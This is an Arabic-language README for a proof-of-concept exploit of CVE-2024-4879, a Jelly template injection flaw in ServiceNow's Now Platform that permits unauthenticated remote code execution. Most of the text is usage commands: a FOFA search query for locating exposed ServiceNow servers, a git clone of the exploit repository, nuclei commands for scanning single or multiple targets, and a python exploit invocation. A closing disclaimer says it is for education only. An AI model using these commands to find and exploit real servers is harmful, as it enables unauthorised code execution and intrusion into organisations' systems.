
ثغرة حقن قالب Jelly في ServiceNow | POC CVE-2024-4879
قامت ServiceNow بمعالجة ثغرة في التحقق من صحة الإدخال تم اكتشافها في إصدارات Now Platform الخاصة بفانكوفر وواشنطن العاصمة. قد تمكن هذه الثغرة مستخدمًا غير موثّق من تنفيذ كود عن بُعد في سياق Now Platform.
FOFA : "server : servicenow"
git clone https://github.com/fa-rrel/CVE-2024-4879.git
cd CVE-2024-4879
هدف واحد:
nuclei -u https://target.com -t CVE-2024-4879.yaml -nh
أهداف متعددة:
nuclei -l urls.txt -t CVE-2024-4879.yaml -nh
python3 CVE-2024-4879.py -i (192.168.1.1)
// إخلاء مسؤولية // الاختراق دون إذن غير قانوني. هذا المستودع مخصص للأغراض التعليمية فقط لتعلم الأمن السيبراني في مجالات الاختراق الأخلاقي واختبار الاختراق وصيد الثغرات حتى نتمكن من حماية أنفسنا من المخترقين الحقيقيين..